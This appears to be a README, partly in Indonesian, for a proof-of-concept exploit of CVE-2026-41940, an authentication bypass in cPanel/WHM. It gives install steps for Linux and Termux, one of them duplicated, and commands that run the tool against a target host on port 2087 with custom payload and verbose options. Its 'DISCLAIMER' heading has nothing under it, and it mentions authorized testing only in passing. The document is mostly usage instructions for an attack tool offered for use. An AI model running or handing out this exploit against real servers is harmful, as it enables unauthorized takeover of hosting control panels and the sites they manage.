
Proof-of-concept exploit for CVE-2026-41940, an authentication bypass in cPanel/WHM. Supports custom payloads and verbose logging, compatible with Linux and Termux for authorized security testing.
Linux dan Termux compatible version dari CVE-2026-41940 cPanel/WHM authentication bypass exploit.
pkg update && pkg upgrade
pkg install python3 python3-pip git
git clone https://github.com/Xrzmodz444/cve-2026-41940-PoC-Linux
cd cve-2026-41940-PoC-Linux
pip install -r requirements.txt
git clone https://github.com/Xrzmodz444/cve-2026-41940-PoC-Linux
cd cve-2026-41940-PoC-Linux
pip3 install -r requirements.txt
python3 cve.py -h
# Target default
python3 cve.py
# Target custom
python3 cve.py http://target.com:2087
# Dengan custom payload
python3 cve.py http://target.com:2087 -p payload.txt
# Verbose mode
python3 cve.py http://target.com:2087 -v
⚠️ DISCLAIMER:
✅ Linux/Termux compatible ✅ Cross-platform (Windows, Mac, Linux) ✅ No native Windows dependencies ✅ Easy to use ✅ Verbose logging ✅ Payload customization
pip install requests
Made for Linux/Termux users 🐧📱